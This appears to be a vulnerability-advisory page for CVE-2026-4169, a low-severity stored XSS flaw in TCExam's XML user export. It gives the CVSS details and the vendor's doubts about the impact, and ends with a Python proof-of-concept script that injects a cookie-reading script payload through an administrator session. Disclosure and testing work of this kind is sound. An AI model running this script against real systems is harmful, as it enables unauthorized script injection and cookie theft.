Security Vulnerability Report
CVE-2026-4169 CVSS 2.4 LOW

Published: 2026-03-16 14:19:57
Last Modified: 2026-04-22 21:30:26

Description

A security flaw has been discovered in Tecnick TCExam up to 16.6.0. Affected is the function F_xml_export_users of the file admin/code/tce_xml_users.php of the component XML Export. Manipulation results in cross-site scripting. The attack can be exploited remotely. There are still doubts about whether this vulnerability truly exists. Upgrading to version 16.6.1 addresses this issue. The patch is named 899b5b2fa09edfe16043f07265e44fe2022b7f12. It is suggested to upgrade the affected component.

When the vendor was informed about another security issue, he identified and fixed this flaw during analysis. He doubts the impact of this: "However, this is difficult to justify as security issue. It requires to be administrator to both create and consume the exploit. Administrators can do pretty much anything in the platform, so I don't see the point of this from a security perspective." This is reflected by the CVSS vector.

CVSS Details

CVSS Score: 2.4
Severity: LOW
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Tecnick TCExam <= 16.6.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import base64

# CVE-2026-4169 PoC - Tecnick TCExam XSS via XML Export
# Target: Tecnick TCExam <= 16.6.0

TARGET_URL = "http://target-website.com/tcexam"
USERNAME = "admin"
PASSWORD = "admin_password"

session = requests.Session()

# Step 1: Login to get authenticated session
login_url = f"{TARGET_URL}/admin/code/tce_login.php"
login_data = {
    "user_name": USERNAME,
    "user_password": PASSWORD,
    "action": "login"
}
session.post(login_url, data=login_data)

# Step 2: Inject XSS payload into user profile field
# Target field: user_name or any user-related field
xss_payload = '<script>alert(document.cookie)</script>'
update_url = f"{TARGET_URL}/admin/code/tce_edit_user.php"
update_data = {
    "user_id": "1",
    "user_name": xss_payload,
    "change_user": "true"
}
session.post(update_url, data=update_data)

# Step 3: Trigger XML export to trigger XSS
xml_export_url = f"{TARGET_URL}/admin/code/tce_xml_users.php"
response = session.get(xml_export_url)

# Check if payload is reflected in XML output
if xss_payload in response.text:
    print("[+] XSS payload found in XML export response")
    print("[+] PoC successful - vulnerability confirmed")
else:
    print("[-] Payload not found - vulnerability may be patched")
```
